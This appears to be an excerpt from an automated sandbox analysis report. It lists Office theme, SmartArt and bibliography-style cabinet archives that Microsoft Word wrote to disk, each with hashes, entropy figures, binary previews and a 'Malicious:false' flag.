                                                                                      Preview:MSCF.....x......D...............l............x..`?..........|...D..............M[. .content.inf...!........M[. .Damask.thmx...o.PI..[.............../.TU.jj0..3jCUPU.jF...m.UU.P}.....PU..*........w..#....E..].................A.. w.$..@..'g.......6%:..r9..d.M;M+.r.8[d{.s..dh..(P..........!.. ..ne..f.Nc..#..Y..q....KB}..b].@..F.&.t....E.........@&.m......$w......q...:.H....p.p.....?.9x.. .....?...ao....I....................o......g.u..;."....O;....{..(k..._.w/.Z......Jb..P.O?...........?....F....ty..72......! #....v..J......?.....!,.5.7..Em.....is.h.. \.H*)i1v..zwp.....P.....x].X{O//..\....Z>z....6...+..a.c...;.K..+...?014..p.w%o^.....]...MguF...`....r.S.......eF..):.dnk#.p{..<..{..Ym...>...H......x.}.hI..M....e......*G.&.?..~.~G6.....+...D..p...._...T....F6.[Cx./Q..Xe.>.;.}>.^..:..SB.X..2.......(A..&j9....\\.......Haf+]Y...$t^Y=........><.w....tL../E...%6.Vr~MI...l.....<.0.I....7.Q8y.f.uu...I.p..O..eYYS.O......9..Qo.......:..........o.............{
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 1750009 bytes, 2 files, at 0x44 +A "content.inf" +A "Slate.thmx", flags 0x4, ID 28969, number 1, extra bytes 20 in head, 72 datablocks, 0x1503 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):1766185
                                                                                      Entropy (8bit):7.9991290831091115
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:O/gjMj+RP9Q07h9F75a0BXjBccHMVk2Hq2SkGa0QglyZtxmdPP2LcSUtfgfp16Yx:kJ6RP9Q07/X5V7yVF0QgktxAPutUt0zP
                                                                                      MD5:828F96031F40BF8EBCB5E52AAEEB7E4C
                                                                                      SHA1:CACC32738A0A66C8FE51A81ED8E27A6F82E69EB2
                                                                                      SHA-256:640AD075B555D4A2143F909EAFD91F54076F5DDE42A2B11CD897BC564B5D7FF7
                                                                                      SHA-512:61F6355FF4D984931E79624394CCCA217054AE0F61B9AF1A1EDED5ACCA3D6FEF8940E338C313BE63FC766E6E7161CAFA0C8AE44AD4E0BE26C22FF17E2E6ABAF7
                                                                                      Malicious:false
                                                                                      Preview:MSCF............D...............)q..............0?..........{...H..............M.. .content.inf.;.#........M.. .Slate.thmx.p.+..P..[......U..............p..K.!.......*...K..w..v........=....D$r...B....6 ...X.F0..d..m.s...$$r........m.)6.m3....vXn.l..o...a...V......Ru.:=2M.........T.....4S`EP......\..r,..v...G.P......'._H0]..%_............X.P.,.............H.?.-.H..".......M..&..o....R........<......`...D.H.._.G.Qv..(.*.U,.9..D...."..T..i.e../.e.."....,S...o.X.....c./..V....Z..o.O..2....{...+... ....0.@J.R.Q.m.....{.....h?u.q.O{...l.d)..Yk`.....#...u.-.m..#CXwrz4..7.>......v.E:.#.oGSKS.TX.Chm.4aQ......avH..{..j+@6[k].....`c..W8..j.v.Zh.]....4......K..#Hzyd..K}.....H|<H..\(l...+..%Z......~.S:^..d>..1..H%..7N-v.....Wu.*..b^.B.....k0gc.2.{.!...E7.}3.d...{.Ye...&#f6...:2......v..&!..k0d.p.b...,..$.....Y..60...h.N}.r...<[./........{...Es..&.nf.....2.@Fh3.9.G....l.[.C..SD/6.H.K....}..m....M..........gl.P.]..I......5....e.c...V....P...[.=.......O.eq+
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 2573508 bytes, 2 files, at 0x44 +A "content.inf" +A "Mesh.thmx", flags 0x4, ID 62129, number 1, extra bytes 20 in head, 94 datablocks, 0x1503 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):2591108
                                                                                      Entropy (8bit):7.999030891647433
                                                                                      Encrypted:true
                                                                                      SSDEEP:49152:ZSBBeAefkpB5iXfQJgi7JBaCCRZ3cM2VDHkvSJO6qzI1tE9Rn:EBI6gbCkMPDHKSJO6qsP6n
                                                                                      MD5:BEB12A0464D096CA33BAEA4352CE800F
                                                                                      SHA1:F678D650B4A41676BA05C836D462F34BDC5BF648
                                                                                      SHA-256:A44166F5C9F2553555A43586BA5DB1C1DE54D72D308A48268F27C6A00076B1CA
                                                                                      SHA-512:B6E7CCD1ECBB9A49FC72E40771725825DAF41DDB2FF8EA4ECCE18B8FA1A59D3B2C474ADD055F30DA58C7E833A6E6555EBB77CCC324B61CA337187B4B41F7008B
                                                                                      Malicious:false
                                                                                      Preview:MSCF.....D'.....D............................D'..D..........z...^..............M7. .content.inf............M7. .Mesh.thmx....&~j..[.....0.................]............ww,v.\....D......3m..m!f..0..E{..?..`..A...k.:....I..........|bmG.FS...f.;.J.vzb.......R.......-....|.......ESD.....".4M..M..t.N....y..,..#.4.5.2.......'.8.Q..3.D..T....!.......&rJg...s........(..9........Dw..'....9.-..G.c............E.. .O.....a..O.._..s..)7Wz~....bJ..D...o....0..R/.#...?.......~6.Q?....?y...g.?............TP..r-...>....-..!.6...B.....\../...2....4...p$...Oge.G.?.....S.#x(..$.A~.U.%f....dJ..S.f{.g.._..3{.fm2.....Z.\o&.[k.m....ko.8..r.-.Go.OQ..'!6..f.L...Ud.$.q*.L.....R.. J.T&4g...7.2K...#k.[.].:....lk.....;c..DRx.`..&L..cpv*.>.Ngz~.{..v5.\...'C.<R:.C8.|.fE{......K...).....T...gz}..rF..Q.dof7.....D.f=cm...U|.O.]F...5zg(.. ....S..._?D....^..+.i...Z.....+X..U!4qy..._..`I..>./.W.7......=.O....BG..=..%9|...3.?...}.$"..H..u...0.......a..:t?.....8...Z..#g.=<.e.`\......KQ..U....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 2511552 bytes, 2 files, at 0x44 +A "content.inf" +A "Main_Event.thmx", flags 0x4, ID 59889, number 1, extra bytes 20 in head, 90 datablocks, 0x1503 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):2527736
                                                                                      Entropy (8bit):7.992272975565323
                                                                                      Encrypted:true
                                                                                      SSDEEP:49152:NFXdpz4d98p/q5jA4q+9Uf5kx6wHR8WfPJZVhWzH4dRze76YP9nJ7yyAInT76nSY:NFXdKx5sM9SmxHKexZVhutJJVpCSqa0Z
                                                                                      MD5:F256ACA509B4C6C0144D278C7036B0A8
                                                                                      SHA1:93F6106D0759AFD0061F73B876AA9CAB05AA8EF6
                                                                                      SHA-256:AD26761D59F1FA9783C2F49184A2E8FE55FCD46CD3C49FFC099C02310649DC67
                                                                                      SHA-512:08C57661F8CC9B547BBE42B4A5F8072B979E93346679ADE23CA685C0085F7BC14C26707B3D3C02F124359EBB640816E13763C7546FF095C96D2BB090320F3A95
                                                                                      Malicious:false
                                                                                      Preview:MSCF.....R&.....D............................R&.8?..............Z..............M). .content.inf..,........M). .Main_Event.thmx......R..[...............=.1.^xa..^...../..^x....QA^"....^/.I.{/F..F..........6Vn. ..._Hmc......<....#.{.@.....Xl../Y....Ye..'V.f.S.Vf.T..0t+..y...5O...{.....-.dT...........!...[ .ns..k.....QAA.. ....B..u.`.....{.\u8.0.....@t........K....@..w.......>...-1F...........1.E....O............_M.m..CP.O......X......g......].../..:C...Q...i.._"...M..1o...S../...9....k;...}S........y..;1o....1h......t.CL.3...].@...T...4.6.}.....M...f...[.s.."f....nZ.W......0.c.{.`.^..Oo.[.JT.2].^.f..a....kO......Q..G..s.5...V.Wj.....e...I,]...SHa..U.N.N.....v.C.....x..J{.Z.t...]WN...77BO-J......g......3:i..2..EFeL.,n..t:..,~4gt.w...M.5.'h.L..#..A&.O.ys%K.Z....F.PW..=jH...jGB.i..j.J.^.#.\n...J@.....-5.f.1jZ68.o...H2.......$O...>..ld&,#$.&_....yl.fkP$.........l....s....i.tx.~<.z...>..2.Gx..B..z.E.3.N<....`$.....b..?.w.[.X..1.=q!.s......v.......r.w
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 3239239 bytes, 2 files, at 0x44 +A "content.inf" +A "Vapor_Trail.thmx", flags 0x4, ID 19811, number 1, extra bytes 20 in head, 111 datablocks, 0x1503 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):3256855
                                                                                      Entropy (8bit):7.996842935632312
                                                                                      Encrypted:true
                                                                                      SSDEEP:98304:wh7I1aeH9YvgK+A+a7GiiQzP4YZDpQ2+Sd6Y:w21ay93aypQzzhpBL/
                                                                                      MD5:8867BDF5FC754DA9DA6F5BA341334595
                                                                                      SHA1:5067CCE84C6C682B75C1EF3DEA067A8D58D80FA9
                                                                                      SHA-256:42323DD1D3E88C3207E16E0C95CA1048F2E4CD66183AD23B90171DA381D37B58
                                                                                      SHA-512:93421D7FE305D27E7E2FD8521A8B328063CD22FE4DE67CCCF5D3B8F0258EF28027195C53062D179CD2EBA3A7E6F6A34A7A29297D4AF57650AA6DD19D1EF8413D
                                                                                      Malicious:false
                                                                                      Preview:MSCF....Gm1.....D...............cM..........Gm1..D..............o... ..........MP. .content.inf...7. ......MP. .Vapor_Trail.thmx..n...N..[......L........7...+I..x...P7/...BH..Rm.\yqi.x..B....{.m.............=.....p.%.@......BpV.[......C.4..X./..Y.'SB..........0.Gr.FG.).....R\...2..Jt..1..._.4_B..................cn7H.-.....Q...1..G{G.~.. '.$......@.(....=@=..`....@.@.A. ....'.4`. .@....D...'....S.s..9.7" /....?.aY.c.........LG....k...?_.....P.....?.1.....FB..m..t...['......:...?...W..../~..z.Tr...X.@...._....3..N..p.....b...t.....^..t...~..t.8A...t_....D..3R.Z.=..{.A.8).3-5..v.isz....0A~%.s.D.4....k.K......8......)R.}f.E..n.g&:W...'E....4%T..>......b.y..[..zI....e...j.s....F.....|7826U.C.,..BY.U.F.f......"..#.m..,..._...#.\.....gPP.2.}Kas......g..3.d0.Z.Z.]..n......MY]6.....].m..D.6...?.n.20.,.#...S...JK..#.W.%.Z4.....i..CBf...../..z......n.N...U.....8t...ny...=.!..#..SF..e...1.P..@.Qx*.f.;..t..S.>..... F..)...@.Y..5j....x....vI.mM....Z.W..77...
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 3400898 bytes, 2 files, at 0x4c "Insight design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 106 datablocks, 0x1203 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):3417042
                                                                                      Entropy (8bit):7.997652455069165
                                                                                      Encrypted:true
                                                                                      SSDEEP:98304:1YYkj2mRz6vkkB15AW4QD0ms+FdniD60bDUpS:qYkj7d6vP7NZDLn+PM8
                                                                                      MD5:749C3615E54C8E6875518CFD84E5A1B2
                                                                                      SHA1:64D51EB1156E850ECA706B00961C8B101F5AC2FC
                                                                                      SHA-256:F2D2DF37366F8E49106980377D2448080879027C380D90D5A25DA3BDAD771F8C
                                                                                      SHA-512:A5F591BA5C31513BD52BBFC5C6CAA79C036C7B50A55C4FDF96C84D311CCDCF1341F1665F1DA436D3744094280F98660481DCA4AA30BCEB3A7FCCB2A62412DC99
                                                                                      Malicious:false
                                                                                      Preview:MSCF......3.....L.............................3..?..............j.....3.....t.4.............Insight design set.dotx.................Content.inf...QJ.N..[.........R.....L....N).J|E.B.$.B).3,...n.....JW....k.U1..M...3#.5....$^.....;vR...Z.nj...#......^*......a.{..(..o.v...!L`...T.-&jZ`.\.*0.....G.."b.m..F.X......$>%..?.D..H.l.j....$.......MrQ......q-....hx...6.D.3...j....n..U#R..3....sm?..xJr..............$G8..t.g...?.g.}......$P._...7.#..w..9DR....*lu....?..'.Ai..v.vl..`......B..N_....W./.;...c=oYW.lL'bv.......+...9.P..B=...*Y.SX=EL.5o....?H.e|.Fn.M[...d.v.....i......9..U..H....uq.Nrn..@..e...3....8.....s8}z..$........B....26...d..?.l....=.aeM.[..|n....H.;..7A.`....=.F...V.Y.l..8.........%e.x0S.....~..2..%.....U..#.r_.0V.v.6w.l.......Y.........v..o+....*sn.$^'.Il...akUU....w....~.....&8.Vwj.....Q.uQ..&..G.($.2.s.?m.B.~j.*..+G.W..qi..g..5.)){O........o.ow.(;.{...y;n...J...&.F2.@.;......[{'w..........`....czW.........?W...}..w....x..........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 5864 bytes, 2 files, at 0x44 "architecture.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):22008
                                                                                      Entropy (8bit):7.662386258803613
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:M7FUtfIdqSHQs7G8E0GftpBjED/C4RQrFLrHRN7TT8DlvQyUTL2mH:sWgdqR2G8Pi6D6YQZTTMvU+mH
                                                                                      MD5:ABBF10CEE9480E41D81277E9538F98CB
                                                                                      SHA1:F4EA53D180C95E78CC1DA88CD63F4C099BF0512C
                                                                                      SHA-256:557E0714D5536070131E7E7CDD18F0EF23FE6FB12381040812D022EC0FEE7957
                                                                                      SHA-512:9430DAACF3CA67A18813ECD842BE80155FD2DE0D55B7CD16560F4AAEFDA781C3E4B714D850D367259CAAB28A3BF841A5CB42140B19CFE04AC3C23C358CA87FFB
                                                                                      Malicious:false
                                                                                      Preview:MSCF............D................................?..................................architecture.glox.................Content.inf..q5.^...[.....0y......../..CL.C5.Q..U5g.z....UUUMPC...C..P....T.....=..s..4c...-3H..E...2..2*..T...../.i.;$..............%...................'h.........#0.......[........c.h.....O...%.61...[.J..:.,^....W.]$..u...N.R.....H.......:%I.g5Kd.n6...W2.#.UL..h.8NN../.P...H.;@.N.F...v."h..K.....~.....8...{.+...&.#A.Q'..A.....[NJ.X.....|.|.G5...vp.h.p..1.....-...gECV.,o{6W.#L....4v..x..z..)[.......T.....BQ.pf..D.}...H....V..[._.'.......3..1....?m..ad..c(K.......N.N.6F%.m......9...4..]?...l6..).\p;w.s....@...I%H.....;\...R......f...3~:C...A..x....X...>...:~.+..r@..."......I..m.y..)F.l..9...6....m...=..Q.F.z..u......J].{WX...V.Z.b.A0B..!....~.;Z.....K.`c..,X.MFz....].Q.2.9..L."...]...6...JOU..6...~../......4A.|.......i.LKrY...2.R.o..X.\....0.%......>H.....8.z..^....5d|...4|...C......R28.E......a....e...J.S..Ng.]<&..mm
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 4091 bytes, 2 files, at 0x44 "BracketList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):20235
                                                                                      Entropy (8bit):7.61176626859621
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:j3W3yGyjgbA8E0GftpBjEHvFLrHRN7pDAlI66Yv1:j3WFyAA8Pi6HVpDZ66c1
                                                                                      MD5:E3C64173B2F4AA7AB72E1396A9514BD8
                                                                                      SHA1:774E52F7E74B90E6A520359840B0CA54B3085D88
                                                                                      SHA-256:16C08547239E5B969041AB201EB55A3E30EAD400433E926257331CB945DFF094
                                                                                      SHA-512:7ED618578C6517ED967FB3521FD4DBED9CDFB7F7982B2B8437804786833207D246E4FCD7B85A669C305BE3B823832D2628105F01E2CF30B494172A17FC48576D
                                                                                      Malicious:false
                                                                                      Preview:MSCF............D................................?..................................BracketList.glox.................Content.inf....7r...[.... G.q..@...B.....?X!.A.......!........X..Vk.JK...Z..=......PD.....P....5...jp..+..T....b.)np5.7.....Zz........... ..!.....S......1....`....h......T?.Nq../......z....[..:..5f;....O...d.FxD...4...Z....[..a...w..W.[..P...5.]...6..."...+t].!...2\%%`Q.\..)...=>.)......a.$.2.,...2,.Lw.?..+..qf....h....T/B.....}T.E...'.%.....,.......X....b..gt.hPYc|.....a...j...=...{..a.`!8!..|...L.T..k..!,.R.z/W....{..,...+..w.m..sQ..7<x..B....?....\.)..l...d...}.....v..W.C..'=p1c.Z=.W.g.e....&wm..N,..K.T../.oV../=9.}.....".28...r.Q....dzj{....S...1m...x9_...2PXpa...Q.n.$z...c..SGq...k......}kPE..*...3.|.5A.>..6.......+)qCB....q....qNkGe...W]..o..Z...J.<.i......qq.8....q..BE.(...._h.U.\@3.F...KdO..=1j+....).*Q.|B..Z..%......LDYk....j.....{klDW..#CVy}...X..O!..}..s..&..DC.....tL.j..b.......[...n.'..1..Xc...9Q..gM.....n..3...v.....~.).
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 12767 bytes, 2 files, at 0x4c "ieee2006officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):28911
                                                                                      Entropy (8bit):7.7784119983764715
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:WnJY165YD0tPYoCKa3HueqRyzVscLk1Yj2GjcgbA8E0GftpBjE2kWTpjFLrHRN7N:X4rtPzCK6uRoljXBA8Pi62ZphL0HRA5p
                                                                                      MD5:6D787B1E223DB6B91B69238062CCA872
                                                                                      SHA1:A02F3D847D1F8973E854B89D4558413EA2E349F7
                                                                                      SHA-256:DA2F261C3C82E229A097A9302C8580F014BB6442825DB47C008DA097CFCE0EE4
                                                                                      SHA-512:9856D88D5C63CD6EBCF26E5D7521F194FA6B6E7BF55DD2E0238457A1B760EB8FB0D573A6E85E819BF8E5BE596537E99BC8C2DCE7EC6E2809A43490CACCD44169
                                                                                      Malicious:false
                                                                                      Preview:MSCF.....1......L............................1...?...................0......"}..............ieee2006officeonline.xsl.:...............Content.inf.........[...G."...3$pE...G B....m3o[...I2&.f.,\..........}.n..{..e.8!^.3.A@...x..... .D.52gU..]..."..N8....s..CS..J3..HV...m...y..o....F.z......V.j._....=~k.....'.dY........1........#...d13.g.&C...C.xw.`f.hf..........]M....m.m....ud...,+.H~..cL...e#;(RI...eA....I.b...E...2..(...$.j...L...$..A....'[...H9..&..G.Q....".M.yl....]..?j%+....O~.*....|.se...K\.B"W..F.5.......=s...l.Y...K..yN.TBH[...sTWR.N.d...WEa....T.d.K.^sauI......m..s=.,qso5.b.V.s.]..9..,k4.\..L.;D...........;r.C...7.w.j..:N8.V6..a.3..j:A.mA..To..$.5....:./..p.x.3.=..__...8.EB.K.*..].-."..5-XU..J.....=o..K.Wavg.o].z.9.gk.._.........MZ.<.5............OY.n.o...r.9v.c.......[n.[..D...d..}.j.....LB,]_.9..St.@..C....\...^....-&.njq..!P....G^.....w.7.p~.......M..g.J............t1......q.w.rx...qp.....E.........-...2..G.........z.]B........d....C.@...@.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 15461 bytes, 2 files, at 0x4c "gostname.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):31605
                                                                                      Entropy (8bit):7.820497014278096
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:7SpOUxgQ9gFodHZktfHa2TSmcAg76j8/xorK0JoZgbA8E0GftpBjE2PzFLrHRN7S:OngHltf7Bcp/xoB3A8Pi625D8RA54
                                                                                      MD5:69EDB3BF81C99FE8A94BBA03408C5AE1
                                                                                      SHA1:1AC85B369A976F35244BEEFA9C06787055C869C1
                                                                                      SHA-256:CEBE759BC4509700E3D23C6A5DF8D889132A60EBC92260A74947EAA1089E2789
                                                                                      SHA-512:BEA70229A21FBA3FD6D47A3DC5BECBA3EAA0335C08D486FAB808344BFAA2F7B24DD9A14A0F070E13A42BE45DE3FF54D32CF38B43192996D20DF4176964E81A53
                                                                                      Malicious:false
                                                                                      Preview:MSCF....e<......L...........................e<...?...................;......................gostname.xsl."...............Content.inf.[.......[...>..|..32.E..o`h....W.>.^...v..5...m.w.$.U..U......m.mu...'4....m`.9F.. ...I..PTS..O.D...GM#...#CUE.`.`%n..N...G,.~..+.6cv.L...G.m.Y..vy.....Yh9/.m,..wtw..;....Ka.a.{.\...'.....<X....%)...G..d......R./..4$..32..@....f.h....w..ov.}w..[.....{.v.......dr..&w#G..$3.zI&f..(C..L.z5J... .`...!.!4. ...!.` .$........w.J.X7.w_..@.w..f]=.C.....I-....s.s_.x...~..A... ...z...nM..;....Z....vt....6...~.w.....*x.g.h.T.J..-.3=....G.n..ti.A...s...j$.Bf..?......6.t.<j...>.."....&=BO?w.uN.o.t.-r..K....>C..^G..p...k...>.xZ.[fL..n.."].W#...|.i.0W.q.F: ..<#w......w....s....."...n.qu.../rI.....q....P~.B..|b?.N.}..MyO..q..:q.7..-~.xa.S...|.....X.....g.W.3.mo..yy.GG.s>....qy....r........#.F.P..A.......A....b.2..14.8.i6..w.S...v~{0z.<.Z...^!.;2mSV.i....{...U...+...r.;...h.++..T6.a...$....j5F+..1t....b......|.Q\d-.S..2... ......Y..A...s....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 15338 bytes, 2 files, at 0x4c "gosttitle.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):31482
                                                                                      Entropy (8bit):7.808057272318224
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:LgHv7aLOcoLGQ4EykdrHwLa+A8Pi6Iv8ACIa:LwvWyx4EykdTwLaWP7I0ACIa
                                                                                      MD5:F10DF902980F1D5BEEA96B2C668408A7
                                                                                      SHA1:92D341581B9E24284B7C29E5623F8028DBBAAFE9
                                                                                      SHA-256:E0100320A4F63E07C77138A89EA24A1CBD69784A89FE3BF83E35576114B4CE02
                                                                                      SHA-512:00A8FBCD17D791289AC8F12DC3C404B0AFD240278492DF74D2C5F37609B11D91A26D737BE95D3FE01CDBC25EEDC6DA0C2D63A2CCC4AB208D6E054014083365FB
                                                                                      Malicious:false
                                                                                      Preview:MSCF.....;......L............................;...?...................;......................gosttitle.xsl.$...............Content.inf....v....[...=..Ic.32.E...`o.............m....4uk[.,.......{...}k{.R@(Hq..68nv...@.D.....$...j....8Q..........8.8........3...*.bi?Wt...:(..J.;&eii..io.w..z...`.'..i.MLR@.>....N..3`P.>$X@(r.#.D..(....P"_..I.$o.. L!y...I...H.........{.{....{.3....7..w..{w.2sn.dYn.lW...l...c$.UH....L6. .D$$...!F.!... .D............_..'.`.Q.v>..Z..f.n.l....0o.......bK...?s..eO....'.>t......S'..........~....h...v&7:q.x9|qs...%....:..D...ag.....e..'...".A.Y..?w"....p1t.9J.~.4.........~vj.n.8.;.O......../.}..io{p...e...\m.d`.gAm.......1"...N*...8..g"......~..[.e+.....\6i4.....%...Rq.U-p?..4P..4.f.?N.vI?.M\i.;.s..E.L.hu.*...\..5....N......]......\`...rS.\g.....2..!a).?.l.!i.^.t.u...x...g/.A..v.E...\.@.>kM...&.g.....%.......{.....2..E.g...'..[w...N.w..& 4M.a.cu.%:...\.D..Q..C.'fm..i....@._......QI.. ....h..|fB.il.(`..h.d;.l...`.s:
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 17466 bytes, 2 files, at 0x4c "chicago.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 10 datablocks, 0x1203 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):33610
                                                                                      Entropy (8bit):7.8340762758330476
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:IlFYcxiahedKSDNAPk5WEEfA8Pi6xnOKMRA58:2JitdKsNAM5WBDP7xOKMq58
                                                                                      MD5:51804E255C573176039F4D5B55C12AB2
                                                                                      SHA1:A4822E5072B858A7CCA7DE948CAA7D2268F1BB4B
                                                                                      SHA-256:3C6F66790C543D4E9D8E0E6F476B1ACADF0A5FCDD561B8484D8DDDADFDF8134B
                                                                                      SHA-512:2AC8B1E433C9283377B725A03AE72374663FEC81ABBA4C049B80409819BB9613E135FCD640ED433701795BDF4D5822461D76A06859C4084E7BAE216D771BB091
                                                                                      Malicious:false
                                                                                      Preview:MSCF....:D......L...........................:D...?..................XC.....................chicago.xsl. ...............Content.inf.!..B...[...H."m..3C.6...WP!i/Z..vn._...^omvw+...^..L.4o...g..y......^..x...BH.B.K....w.....F........p ./gg.h.0I',.$..a.`.*...^..vi..mw..........K....oQ............P...#...3.......U(.=...q.~?..H..?.'I4'.......X...}w.vw.....f.n..f{3.....-....%dK&q..D.H.Z..h-..H.[$ %.."..e....1...$.............'.....B..%..4...&`S!DQ...M.......N~............S..'....M..4E.^..dej..i..+.`...6F%sJ....Q..d.(*.s.Z...U-5Eh.s.CK...K..X$......j..T.?.`.|...=..R...-7...*...TU.....7a...&I.noOK|.W.R-+S.d..rR.....{h.Y...)..xJ..=.XM..o...P'.I4m..~I..C..m.....f.....;{Mzg+Wm.~...z...r-.....eK...lj:^.1g5...7.h(T"..t?5......u.....G.Z<..sL.\{...8=t...Z...'tps.:...|....6.....S..X...I...6l.M.....aq.;YS....{:.&.'.&.F.l...\.[L.%.so\.v.Lo...zO.^^...p..*9k...).CC..F0>L...VUE4.......2..c..p.rCi..#...b.C@o.l.. E_b..{d...hX.\_!a#.E.....yS.H...aZ...~D3.pj: ss?.]....~
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 19375 bytes, 2 files, at 0x4c "turabian.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):35519
                                                                                      Entropy (8bit):7.846686335981972
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:2LFougzHaUdBKUsM+Z56zBjA8Pi6bo+ld8IX:MFodzHaULR9P7bo+l6IX
                                                                                      MD5:53EE9DA49D0B84357038ECF376838D2E
                                                                                      SHA1:AB03F46783B2227F312187DD84DC0C517510DE20
                                                                                      SHA-256:9E46B8BA0BAD6E534AF33015C86396C33C5088D3AE5389217A5E90BA68252374
                                                                                      SHA-512:751300C76ECE4901801B1F9F51EACA7A758D5D4E6507E227558AAAAF8E547C3D59FA56153FEA96B6B2D7EB08C7AF2E4D5568ACE7E798D1A86CEDE363EFBECF7C
                                                                                      Malicious:false
                                                                                      Preview:MSCF.....K......L............................K...?...................J.......@..............turabian.xsl."...............Content.inf._.......[...T.....C4.5...E0B.]...+.-f....rc.[52.$...a..I....{z...`hx.r...!.. $...l..\....#3EF..r..c;<p...&n.\b..K..0Y..c+.2...i..B..wwY..77,...........}.q.C.......n..,.....prrx.QHy.B#..,.'....3....%1.``..hf...~...[.[n.v.s..y.vw....;..s.G293G&H....$E......m.&^..iy/.4.C...D...".(H&..&.I4._...!...... ........q.k1.d.....qc.3.c.....;.5.......y}...}&...+.WAN.,zVY.Q....V.Tz........g..H..c...E2jY...4g?.yf<....V.M.s.$..k.Id....+..?..._.\.s.k..9..I%;.yWQ..S..]..*.n<.7........=......"Q.*E.....MG..j.Yt..!U....Q.j...v.h-.~b..e&.......;...\.....:.....=..Xv1&q........6\...xw.%*.VdS..H...o...s.....+..%[../>.t..I....F.....".G|.....=....[..S..3..a.C.ZZ...tK.6N..b........)>........I..m..QE.M.nv.MVl.....vCG>,.suP.gqo.rr....J`m....J.b..},[F*....e.A.]..r....C4.?JJs6..l.].9...Q.B.~.......\d%.X ...8A....rH....&?#...^.....4.h.{>
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 18672 bytes, 2 files, at 0x4c "APASixthEditionOfficeOnline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):34816
                                                                                      Entropy (8bit):7.840826397575377
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:i3R9VYnIYfPYmqX0CnF1SRHVnLG8Pi61YbEIFO:ih9VjYfPYlk+F1SJxP71YbEIFO
                                                                                      MD5:62863124CDCDA135ECC0E722782CB888
                                                                                      SHA1:2543B8A9D3B2304BB73D2ADBEC60DB040B732055
                                                                                      SHA-256:23CCFB7206A8F77A13080998EC6EF95B59B3C3E12B72B2D2AD4E53B0B26BB8C3
                                                                                      SHA-512:2734D1119DC14B7DFB417F217867EF8CE8E73D69C332587278C0896B91247A40C289426A1A53F1796CCB42190001273D35525FCEA8BA2932A69A581972A1EF00
                                                                                      Malicious:false
